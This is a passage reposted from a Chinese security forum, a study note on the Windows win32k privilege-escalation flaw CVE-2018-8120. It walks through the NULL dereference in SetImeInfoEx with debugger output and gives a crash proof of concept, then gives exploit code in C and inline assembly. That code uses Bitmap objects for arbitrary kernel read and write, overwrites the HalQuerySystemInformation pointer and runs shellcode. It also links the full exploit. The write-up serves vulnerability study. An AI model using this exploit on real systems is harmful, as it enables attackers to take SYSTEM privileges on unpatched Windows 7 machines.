🔥 热搜 🔥
百度今日热点微信公众平台贴吧opggdnf私服百度贴吧知乎dnf公益服百度傻逼
分类
社会娱乐国际人权科技经济其它
🔥 热搜 🔥
上海习近平新疆鄂州父女瓜乌鲁木齐疫情H工口小学生赛高习明泽芊川一笑图包印尼排华
分类
社会娱乐国际人权科技经济其它
查看原文
其他

CVE-2018-8120提权漏洞学习笔记

1900 看雪学苑 2022-07-01
收录于合集 #“雪花”创作激励计划 97个


本文为看雪论坛精华文章
看雪论坛作者ID:1900





简介


1、漏洞描述

该漏洞存在与win32k模块中的SetImeInfoEx函数,在该函数中未对tagWINDOWSTATION结构偏移0x14的spkiList进行有效性验证就对其进行解引用操作,而spkList可以为NULL,此时就会对地址0x14进行解引用操作,导致系统崩溃。通过在0地址申请内存的方式可以绕过解引用产生的系统崩溃,函数会继续向下运行执行写操作,通过这个写操作可以完成任意地址写,最终完成提权。

2、实验环境

  • 操作系统:Win7 x86 sp1 专业版

  • 编译器:Visual Studio 2017

  • 调试器:IDA Pro,WinDbg






漏洞分析


1、漏洞成因

SetImeInfoEx函数的反汇编结果如下:
图1  SetImeInfoEx函数反汇编

第1处的代码是取出参数pWinStation偏移0x14处的内容,参数pWinStation是tagWINDOWSTATION结构,该结构体定义如下:
2: kd> dt win32k!tagWINDOWSTATION +0x000 dwSessionId : Uint4B +0x004 rpwinstaNext : Ptr32 tagWINDOWSTATION +0x008 rpdeskList : Ptr32 tagDESKTOP +0x00c pTerm : Ptr32 tagTERMINAL +0x010 dwWSF_Flags : Uint4B +0x014 spklList : Ptr32 tagKL +0x018 ptiClipLock : Ptr32 tagTHREADINFO +0x01c ptiDrawingClipboard : Ptr32 tagTHREADINFO +0x020 spwndClipOpen : Ptr32 tagWND +0x024 spwndClipViewer : Ptr32 tagWND +0x028 spwndClipOwner : Ptr32 tagWND +0x02c pClipBase : Ptr32 tagCLIP +0x030 cNumClipFormats : Uint4B +0x034 iClipSerialNumber : Uint4B +0x038 iClipSequenceNumber : Uint4B +0x03c spwndClipboardListener : Ptr32 tagWND +0x040 pGlobalAtomTable : Ptr32 Void +0x044 luidEndSession : _LUID +0x04c luidUser : _LUID +0x054 psidUser : Ptr32 Void

偏移0x14处的成员是spkList,该成员指向tagKL结构,结构体定义如下:
2: kd> dt win32k!tagKL +0x000 head : _HEAD +0x008 pklNext : Ptr32 tagKL +0x00c pklPrev : Ptr32 tagKL +0x010 dwKL_Flags : Uint4B +0x014 hkl : Ptr32 HKL__ +0x018 spkf : Ptr32 tagKBDFILE +0x01c spkfPrimary : Ptr32 tagKBDFILE +0x020 dwFontSigs : Uint4B +0x024 iBaseCharset : Uint4B +0x028 CodePage : Uint2B +0x02a wchDiacritic : Wchar +0x02c piiex : Ptr32 tagIMEINFOEX +0x030 uNumTbl : Uint4B +0x034 pspkfExtra : Ptr32 Ptr32 tagKBDFILE +0x038 dwLastKbdType : Uint4B +0x03c dwLastKbdSubType : Uint4B +0x040 dwKLID : Uint4B

获取spkList后,就在第2处进行对spkList偏移0x14处的地址进行解引用操作。可是,在执行2处的代码之前,函数并没有验证spkList是否合法。如果spkList为NULL,那么此时2处的代码就是对地址0x14进行解引用,因为0x14不是个合法地址,就回导致系统崩溃。

2、漏洞验证

要验证这个漏洞,需要两个步骤,首先这个漏洞是由于SetImeInfoEx函数对tagWINDOWSTATION结构体中的spkList成员操作产生的,需要首先调用函数CreateWindowStation来创建一个tagWINDOWSTATION结构体,该函数定义如下:
HWINSTA WINAPI CreateWindowStation( __in_opt LPCTSTR lpwinsta, DWORD dwFlags, __in ACCESS_MASK dwDesiredAccess, __in_opt LPSECURITY_ATTRIBUTES lpsa);
创建完结构体以后,需要通过SetProcessWindowStation来为当前进程设置创建的tagWINDOWSTATION,该函数定义如下:
BOOL WINAPI SetProcessWindowStation( __in HWINSTA hWinSta);

为当前进程设置完结构体以后,就可以来触发漏洞,通过IDA交叉引用可以发现,只有NtUserSetImeInfoEx函数调用了SetImeInfoEx函数,该函数的反汇编结果如下:


在第1处,函数将参数内容复制到imeInfoEx中作为调用SetImeInfoEx函数的第二个参数,在2处通过调用GetProcessWindowStation来作为调用SetImeInfoEx函数的第一个参数。那么此时,第一个参数就是创建的tagWINDOWSTATION,第二个参数通过调用NtUserSetImeInfoEx时指定,也就是可以由我们来指定。

NtUserSetImeInfoEx函数是未导出函数,所以只能通过自己指定调用号产生系统调用来调用该函数,而NtUserSetImeInfoEx函数的调用号为0x1226,所以,可以使用如下代码来调用NtUserSetImeInfoEx函数:
BOOL __declspec(naked) CallNtUserSetImeInfoEx(PVOID arg0){ __asm { mov esi, arg0 mov eax, 0x1226 // NtUserSetImeInfoEx的调用号 mov edx, 0x7FFE0300 call dword ptr[edx] ret 4 }}

由此,可以写出如下的POC:
BOOL POC_CVE_2018_8120(){ BOOL bRet = TRUE; HWINSTA hSta = NULL; // 创建tagWINDOWSTATION结构体 hSta = CreateWindowStation(NULL, 0, READ_CONTROL, NULL); if (hSta == NULL) { ShowError("CreateWindowStation", GetLastError()); bRet = FALSE; goto exit; } // 将创建的结构体设置到本进程中 if (!SetProcessWindowStation(hSta)) { ShowError("SetProcessWindowStation", GetLastError()); bRet = FALSE; goto exit; } char szBuf[0x15C] = { 0 }; CallNtUserSetImeInfoEx((PVOID)szBuf); exit: return bRet;}

编译运行POC,此时系统就会崩溃,崩溃信息如下,可以看到,产生崩溃的指令是在对[eax+0x14]的地址进行解引用产生的,这条指令就对应图1中的第2处的代码,此时寄存器eax的值为0,所以执行这条指令时,会对0x14地址进行解引用,该地址是并不是有效地址,就导致了系统的崩溃。
nt!RtlpBreakWithStatusInstruction:83e95110 cc int 3kd> gKDTARGET: Refreshing KD connectionAccess violation - code c0000005 (!!! second chance !!!)win32k!SetImeInfoEx+0x17:969a007c 395014 cmp dword ptr [eax+14h],edx3: kd> r eaxeax=000000003: kd> kChildEBP RetAddr 92085a90 969a003d win32k!SetImeInfoEx+0x1792085c28 83e581ea win32k!NtUserSetImeInfoEx+0x6592085c28 772870b4 nt!KiFastCallEntry+0x12a0012fd98 0040105f ntdll!KiFastSystemCallRet





漏洞利用


1、利用原理

由上内容可知,之所以产生崩溃是因为地址0x14是无效地址,因此,可以通过在0地址申请内存的方式让该地址有效,这样执行图1的第2处代码的时候就不会产生系统的崩溃,继续向下执行。在执行图1的第5处的代码的时候,会产生写操作。

函数会向spkList偏移0x2C处保存的地址进行写入操作,由于此时spkList为0,所以函数会向0x2C中保存的地址进行写入操作。写入的内容则由传入的参数决定,这个参数又可以在调用NtUserSetImeInfoEx函数时指定。

因此,可以通过将地址0x2C赋值为保存了HalQuerySystemInformation函数地址的地址,在调用NtUserSetImeInfoEx函数时指定参数的前4字节为ShellCode地址的方式,来对保存HalQuerySystemInformation函数地址的地址中的内容修改为ShellCode的地址,这样通过NtQueryIntervalProfile函数就可以调用ShellCode。

根据上述思路,此时就可以用以下的代码来实现提权:
BOOL Trigger_CVE_2018_8120(){ BOOL bRet = TRUE; // 0地址分配内存 if (!AllocateZeroMemory()) { bRet = FALSE; goto exit; } // 获取保存HalQuerySystemInformation函数地址的地址 PVOID pHalQuerySystemInformation = GetHalQuerySystemInformation(); if (!pHalQuerySystemInformation) { bRet = FALSE; goto exit; } // 指定被写入的地址 *(PDWORD)(0x2C) = (DWORD)pHalQuerySystemInformation; // 绕过while循环的验证 *(PDWORD)(0x14) = (DWORD)ShellCode_CVE_2018_8120; char szBuf[0x15C] = { 0 }; // 指定要写入的内容是ShellCode的地址 *(PDWORD)szBuf = (DWORD)ShellCode_CVE_2018_8120; // 触发漏洞 if (!CallNtUserSetImeInfoEx(szBuf)) { ShowError("CallNtUserSetImeInfoEx", GetLastError()); bRet = FALSE; goto exit; } // 调用NtQueryIntervalProfile if (!CallNtQueryIntervalProfile()) { bRet = FALSE; goto exit; } exit: return bRet;}

可是此时提权并不会成功,接下来通过WinDbg进行分析,首先运行到之前导致系统崩溃处的指令,也就是图1中第2处执行的代码,可以看到虽然此时eax依然为0,但是因为在0地址申请了内存,此时0x14地址是有效的,所以不会产生系统的崩溃。
3: kd> pwin32k!SetImeInfoEx+0x17:96ac007c 395014 cmp dword ptr [eax+14h],edx3: kd> r eaxeax=000000003: kd> pwin32k!SetImeInfoEx+0x1a:96ac007f 740e je win32k!SetImeInfoEx+0x2a (96ac008f)

继续向下运行,就会执行到图1中第3处的代码,此时会将地址0x2C中保存的要修改的保存了HalQuerySystemInformation函数地址的地址赋值给eax,此时eax就不会为0,函数会继续运行。
3: kd> pwin32k!SetImeInfoEx+0x2a:96ac008f 8b402c mov eax,dword ptr [eax+2Ch]3: kd> pwin32k!SetImeInfoEx+0x2d:96ac0092 85c0 test eax,eax3: kd> r eaxeax=83f6f3fc3: kd> pwin32k!SetImeInfoEx+0x2f:96ac0094 74f2 je win32k!SetImeInfoEx+0x23 (96ac0088)

继续向下运行就会执行下面的判断指令,判断eax+0x48处保存的内容是否为0,如果不为0则会进行跳转,这两条指令对应的就是图1中的第4处代码。此时eax保存的是保存了HalQuerySystemInformation函数地址的地址,该地址偏移0x48处保存的内容并不为0,这样就跳过了memcpy函数的调用,不会成功执行写入操作,导致程序提权失败。


2、Bitmap

为了成功利用该漏洞,就需要通过BitMap来实现任意地址的读写操作。Bitmap对象的可以通过CreateBitmap函数创建,该函数定义如下:
HRESULT CreateBitmap(UINT uiWidth, UINT uiHeight, REFWICPixelFormatGUID pixelFormat, WICBitmapCreateCacheOption option, IWICBitmap **ppIBitmap);

当用户态程序通过CreateBitmap函数创建了一个Bitmap对象以后,就会在PEB结构中偏移0x094的成员GdiSharedHandleTable所指的结构体数组中增加一项该结构。
3: kd> dt _PEBntdll!_PEB +0x000 InheritedAddressSpace : UChar ... +0x090 ProcessHeaps : Ptr32 Ptr32 Void +0x094 GdiSharedHandleTable : Ptr32 Void +0x098 ProcessStarterHelper : Ptr32 Void ....

而GditSharedHandleTable所指的是GDICELL结构数组,该结构体定义如下:
typedef struct _GDICELL{ LPVOID pKernelAddress; USHORT wProcessId; USHORT wCount; USHORT wUpper; USHORT wType; LPVOID pUserAddress;} GDICELL;

其中第一项pKernelAddress指向了SURFACE结构体,该结构体定义如下:
typedef struct _SURFACE{ BASEOBJECT BaseObject; SURFOBJ SurfObj; //XDCOBJ * pdcoAA; FLONG flags; struct _PALETTE * const ppal; // Use SURFACE_vSetPalette to assign a palette struct _EWNDOBJ *pWinObj; union { HANDLE hSecureUMPD; // if UMPD_SURFACE set HANDLE hMirrorParent;// if MIRROR_SURFACE set HANDLE hDDSurface; // if DIRECTDRAW_SURFACE set }; SIZEL sizlDim; /* For SetBitmapDimension(), do NOT use to get width/height of bitmap, use bitmap.bmWidth/bitmap.bmHeight for that */ HDC hdc; // Doc in "Undocumented Windows", page 546, seems to be supported with XP. ULONG cRef; HPALETTE hpalHint; /* For device-independent bitmaps: */ HANDLE hDIBSection; HANDLE hSecure; DWORD dwOffset; //UINT unk_078; /* reactos specific */ DWORD biClrImportant;} SURFACE, *PSURFACE;

该结构体中保存的前两个成员的结构如下:
typedef struct _BASEOBJECT { HANDLE hHmgr; 0x04 PVOID pEntry; 0x08 LONG cExclusiveLock; 0x0d PW32THREAD Tid;0x10}BASEOBJECT, *POBJ; typedef struct _SURFOBJ { DHSURF dhsurf; HSURF hsurf; DHPDEV dhpdev; HDEV hdev; SIZEL sizlBitmap; ULONG cjBits; PVOID pvBits; PVOID pvScan0; LONG lDelta; ULONG iUniq; ULONG iBitmapFormat; USHORT iType; USHORT fjBitmap;} SURFOBJ;

其中SURFOBJ结构体中的pvScan0中保存的地址指向内核空间之中,在用户态可以通过GetBitmaps和SetBitmaps函数来对pvScan0指向的内核空间中的内容进行读写操作。此时可以创建两个Bitmap对象,分别是hWorker和hManager,这两个Bitmap对象对应的pvScan0分别是wpv和mpv。

通过漏洞的任意地址读写的功能,可以将wpv指向的数据复制到mpv中,此时通过SetBitmapBits来设置hManager的可修改地址为保存HalQuerySystemInformation函数地址的地址。

设置完成了hManager的可修改地址,此时就可以通过hWorker来对hManager的可修改地址,也就是保存HalQuerySystemInformation函数地址的地址进行读写。

这种方式之所以能完成,也是因为此时mpv所指向的地址偏移0x48处的内容为0,另外,因此复制的时候会复制0x15C个字节,所以mpv后面的内容要保证不被修改,就需要在复制的源地址处进行正确的赋值。

此时,漏洞利用的代码如下:
BOOL Trigger_CVE_2018_8120(){ BOOL bRet = TRUE; HBITMAP hManger = NULL, hWorker = NULL; DWORD dwBuf[0x60] = { 0x90 }; PVOID mpv = NULL, wpv = NULL; PVOID pOrgAddr = NULL; PVOID pTargetAddr = (PVOID)ShellCode_CVE_2018_8120; // 0地址分配内存 if (!AllocateZeroMemory()) { bRet = FALSE; goto exit; } hManger = CreateBitmap(0x60, 1, 1, 32, dwBuf); hWorker = CreateBitmap(0x60, 1, 1, 32, dwBuf); if (!hManger || !hWorker) { ShowError("CreateBitmap", GetLastError()); bRet = FALSE; goto exit; } mpv = GetPvScan(hManger); wpv = GetPvScan(hWorker); // 指定被写入的地址 *(PDWORD)(0x2C) = (DWORD)mpv; // 绕过while循环的验证 *(PDWORD)(0x14) = (DWORD)wpv; DWORD szBuf[0x15C / sizeof(DWORD)] = { 0 }; // 指定要写入的内容 szBuf[0] = (DWORD)wpv; szBuf[1] = 0x180; szBuf[2] = 0x1D95; szBuf[3] = 6; szBuf[4] = 0x10000; szBuf[5] = 0x0; szBuf[6] = 0x4800200; // 触发漏洞 if (!CallNtUserSetImeInfoEx(szBuf)) { ShowError("CallNtUserSetImeInfoEx", GetLastError()); bRet = FALSE; goto exit; } // 获取保存HalQuerySystemInformation函数地址的地址 PVOID pHalQuerySystemInformation = GetHalQuerySystemInformation(); if (!pHalQuerySystemInformation) { bRet = FALSE; goto exit; } // 设置hManger的可修改地址为保存HalQuerySystemInformation函数地址的地址 SetBitmapBits(hManger, sizeof(PVOID), &pHalQuerySystemInformation); // 获取可修改的地址中的内容 GetBitmapBits(hWorker, sizeof(PVOID), &pOrgAddr); // 将可修改地址中的值修改为ShellCode地址 SetBitmapBits(hWorker, sizeof(PVOID), &pTargetAddr); // 调用NtQueryIntervalProfile,执行ShellCode if (!CallNtQueryIntervalProfile()) { bRet = FALSE; goto exit; } // 将可修改地址中的内容恢复回去 SetBitmapBits(hWorker, sizeof(PVOID), &pOrgAddr);exit: return bRet;} PVOID GetPvScan(HBITMAP hBitHandle){ DWORD dwGdiCellArray = GetGdiCellArray(); PGDICELL pGdiCell = (PGDICELL)(dwGdiCellArray + LOWORD(hBitHandle) * sizeof(GDICELL)); return (PVOID)((DWORD)pGdiCell->pKernelAddress + 0x30);} DWORD GetGdiCellArray(){ __asm { mov eax, fs:[0x30] // eax = PEB mov eax, [eax + 0x94] // eax = GDICELL数组首地址 }}

此时在编译运行到图1的第4处验证,此时目标地址偏移0x48处的内容为0,函数不会发生跳转,接下去将执行复制操作。
随后的GetBitmapBits/SetBitmapBits就可以实现对HalQuerySystemInformation的修改,最终通过调用NtQueryIntervalProfile就会完成提权。





运行结果


完整的exp代码在:https://github.com/LegendSaber/exp/blob/master/exp/CVE-2018-8120.cpp

可以看到,运行exp以后会成功完成提权:


参考资料:

  • https://www.freebuf.com/vuls/174182.html

  • https://www.anquanke.com/post/id/241057

  • https://www.anquanke.com/post/id/247764




看雪ID:1900

https://bbs.pediy.com/user-home-835440.htm

*本文由看雪论坛 1900 原创,转载请注明来自看雪社区

# 往期推荐

1.基于LLVM编译器的IDA自动结构体分析插件

2.2022 CTF babyarm 内核题目详细分析

3.Go解析

4.IoT设备获取本地shell权限并进行软件调试

5.刚入行时分析的病毒重现

6.记一次新型变种QakBot木马分析






球分享

球点赞

球在看



点击“阅读原文”,了解更多!

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存